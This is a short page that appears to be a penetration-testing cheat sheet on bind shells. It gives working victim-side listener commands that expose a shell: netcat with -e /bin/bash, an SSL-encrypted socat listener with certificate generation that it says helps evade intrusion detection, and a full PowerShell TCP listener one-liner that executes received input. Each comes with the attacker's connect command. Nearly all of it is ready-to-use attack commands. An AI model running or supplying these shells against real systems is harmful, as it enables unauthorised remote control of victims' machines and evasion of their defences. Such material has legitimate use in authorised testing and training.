Bind Shell
In a bind shell, the attacker connects to the target computer.
Netcat
On the victim machine, run the following command:
victim> $ nc -nlvp 4444 -e /bin/bashOn the attacker side, connect to the victim with this command :
attacker> $ nc -nv <victim.IP> 4444Socat
To add encryption to a bind shell, rely on Secure Socket Layer certificates. This level of encryption will assist in evading intrusion detection systems (IDS) and will help hide the sensitive data transceived.
First, create a self-signed certificate:
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pemNow that the key and certificate have been generated, convert them to a format socat will accept. To do so, combine both the bind_shell.key and bind_shell.crt files into a single .pem file before creating the encrypted socat listener.
victim> $ cat bind_shell.key bind_shell.crt > bind_shell.pem
victim> $ sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bashNow, connect attacker's computer to the victim's bind shell.
attacker> $ socat - OPENSSL:10.11.0.4:443,verify=0PowerShell
On the victim command prompt, run the following command:
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"Then, on the attacker machine, connect it using netcat:
attacker> $ nc -nv <victim.IP> 443Last updated